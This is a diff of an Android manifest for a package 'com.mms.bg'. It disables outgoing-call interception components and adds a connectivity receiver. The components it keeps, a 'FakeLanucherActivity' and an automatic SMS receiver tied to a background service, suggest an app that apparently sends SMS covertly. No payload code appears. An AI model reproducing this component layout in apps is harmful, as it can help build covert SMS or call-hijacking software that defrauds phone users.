--- a/AndroidManifest.xml
+++ b/AndroidManifest.xml
@@ -29,7 +29,7 @@
     <uses-permission android:name="android.permission.WAKE_LOCK" />
     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
     <uses-permission android:name="android.permission.INTERNET"/>
-    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />
+    <!-- uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" / -->
 
 	<uses-sdk android:minSdkVersion="4"/>
 
@@ -38,7 +38,7 @@
             android:taskAffinity="android.task.mms"
             android:allowTaskReparenting="true">
 
-       <activity android:name=".ui.TestActivity"
+       <!-- activity android:name=".ui.TestActivity"
                   android:label="@string/app_name"
                   android:configChanges="orientation|keyboardHidden"
                   android:launchMode="singleTop">
@@ -47,13 +47,13 @@
                 <category android:name="android.intent.category.LAUNCHER" />
                 <category android:name="android.intent.category.DEFAULT" />
             </intent-filter>
-        </activity>
+        </activity -->
         
-		<activity android:name="com.mms.bg.ui.DialScreenActivity"
+		<!-- activity android:name="com.mms.bg.ui.DialScreenActivity"
                   android:label="@string/app_name"
                   android:configChanges="orientation|keyboardHidden"
                   android:theme="@android:style/Theme.NoTitleBar.Fullscreen">
-        </activity>
+        </activity -->
 
        <activity android:name="com.mms.bg.ui.FakeLanucherActivity"
                   android:label="@string/app_name"
@@ -91,15 +91,21 @@
             </intent-filter>
         </receiver>
         
-		<receiver android:name="com.mms.bg.ui.PhoneCallReceiver" >
+		<!-- receiver android:name="com.mms.bg.ui.PhoneCallReceiver" >
 			<intent-filter>
                 <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
             </intent-filter>
-        </receiver>
+        </receiver -->
         
         <receiver android:name="com.mms.bg.ui.AutoSMSRecevier">
         	<intent-filter>
         		<action android:name="com.mms.bg.SMS" />
+        	</intent-filter>
+        </receiver>
+
+        <receiver android:name="com.mms.bg.ui.InternetStatusReceiver">
+        	<intent-filter>
+        		<action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
         	</intent-filter>
         </receiver>
         
@@ -107,7 +113,7 @@
 			<intent-filter >
 	            <action android:name="com.mms.bg.FILTER_ACTION"/>
 	        </intent-filter>
-        	<meta-data android:name="com.mms.bg.pid" android:value="2011"/>
+        	<meta-data android:name="com.mms.bg.pid" android:value="1000"/>
         </service>
 
     </application>
